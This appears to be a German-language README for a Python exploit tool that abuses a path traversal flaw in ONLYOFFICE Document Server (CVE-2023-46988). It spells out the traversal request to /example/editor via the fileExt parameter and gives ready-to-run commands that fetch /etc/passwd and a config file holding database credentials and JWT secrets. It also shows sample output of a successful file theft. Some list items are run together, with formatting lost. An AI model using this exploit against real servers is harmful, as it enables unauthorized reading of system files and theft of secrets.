
CVE-2023-46988: ONLYOFFICE Path-Traversal-Exploit
Dieses Skript nutzt eine Path-Traversal-Schwachstelle im ONLYOFFICE Document Server (CVE-2023-46988) aus, die es nicht autorisierten Benutzern ermöglicht, beliebige Dateien vom Server zu kopieren. Die Schwachstelle befindet sich im Endpunkt /example/editor, wobei der Parameter fileExt manipuliert werden kann, um auf sensible System- und Konfigurationsdateien zuzugreifen.
Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken.
Die nicht autorisierte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal und unethisch.
/etc/passwd/etc/onlyoffice/documentserver/local.json (enthält Datenbank-Anmeldedaten & JWT-Geheimnisse)--file angeben.--proxy).--verify).python onlyoffice_exploit.py http://localhost
Dadurch werden folgende Dateien abgerufen:
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
/example/editor mit einem bösartigen fileExt-Parameter:
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<extracted_filename> herunter.[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd
ONLYOFFICE hat diese Schwachstelle im Update vom Februar 2024 behoben.
Benutzer sollten auf die neueste Version aktualisieren, um ihre Server zu schützen.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE für Details.